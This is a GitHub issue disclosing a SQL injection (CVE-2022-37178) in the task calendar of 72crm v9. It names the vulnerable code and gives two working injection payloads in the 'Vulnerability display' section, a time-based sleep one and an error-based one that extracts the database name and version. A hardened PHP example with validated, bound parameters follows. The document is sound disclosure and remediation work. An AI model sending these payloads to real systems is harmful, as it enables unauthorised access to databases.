CVE-2022-37178: 72crm v9 has sql injection vulnerability · Issue #34 · 72wukong/72crm-9.0-PHP
An issue was discovered in 72crm 9.0. There is a SQL Injection vulnerability in View the task calendar.
**Brief of this vulnerability**
72crm v9 has a SQL injection vulnerability in View the task calendar.
**Test Environment**
- Windows 10
- PHP 5.6.9+Apache/2.4.39
**Affected version**
72crm v9
**Vulnerable Code**
`application\work\controller\Task.php`, line 506
The `$param` parameter is passed to `getDateList`.
The `start_time` and `stop_time` parameters are spliced directly into `$whereDate`, which is then executed on line 493, resulting in a SQL injection vulnerability.
**Vulnerability display**
First, enter the backend.
Click as shown, go to View the task calendar, and capture the packet.
payload: `start_time=1&stop_time=1))+or+sleep(2)--+`
The sleep succeeds for 2 seconds.
If debug mode is enabled:
payload: `start_time=1&stop_time=1))+or+updatexml(1,concat(0x7e,database(),0x7e,version()),1)--+`
The database name and version number are successfully obtained.
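
A hardened form of the date filter described under Vulnerable Code, as an added example that is not 72crm's code: `start_time` and `stop_time` are validated as integers and reach the query only as bound parameters. The function names, the `task` table and its columns, and the in-memory SQLite database (requires `pdo_sqlite`) are assumptions; the rejected value is the page's first `stop_time` payload, URL-decoded.

```php
<?php
// Added example, not 72crm code; names and schema are hypothetical.
// Syntax is kept compatible with PHP 5.6, the page's test environment.

// Accept only a non-negative integer timestamp; arrays, null and strings fail.
function requireTimestamp(array $param, $key)
{
    $value = isset($param[$key]) ? $param[$key] : null;
    $int = filter_var($value, FILTER_VALIDATE_INT, ['options' => ['min_range' => 0]]);
    if ($int === false) {
        throw new InvalidArgumentException("$key must be an integer timestamp");
    }
    return $int;
}

// Return a WHERE fragment with placeholders plus its bindings.
// No request value is ever concatenated into the SQL text.
function buildDateWhere(array $param)
{
    $start = requireTimestamp($param, 'start_time');
    $stop  = requireTimestamp($param, 'stop_time');
    if ($stop < $start) {
        throw new InvalidArgumentException('stop_time precedes start_time');
    }
    return [
        'start_time <= :stop AND stop_time >= :start',
        [':start' => $start, ':stop' => $stop],
    ];
}

// Constructed sample data and requests.
$pdo = new PDO('sqlite::memory:');
$pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$pdo->exec('CREATE TABLE task (id INTEGER, start_time INTEGER, stop_time INTEGER)');
$pdo->exec('INSERT INTO task VALUES (1, 100, 200), (2, 900, 950)');
$requests = [
    ['start_time' => '150', 'stop_time' => '300'],               // well-formed
    ['start_time' => '1', 'stop_time' => '1)) or sleep(2)-- '],  // payload from the page
];
foreach ($requests as $param) {
    try {
        list($where, $bind) = buildDateWhere($param);
        $stmt = $pdo->prepare("SELECT id FROM task WHERE $where");
        $stmt->execute($bind);
        echo 'rows: ', json_encode($stmt->fetchAll(PDO::FETCH_COLUMN)), "\n";
    } catch (InvalidArgumentException $e) {
        echo 'rejected: ', $e->getMessage(), "\n";
    }
}
```

Rejecting the request at validation also means no database error is raised for it, so nothing is echoed back through error output when debug mode is enabled.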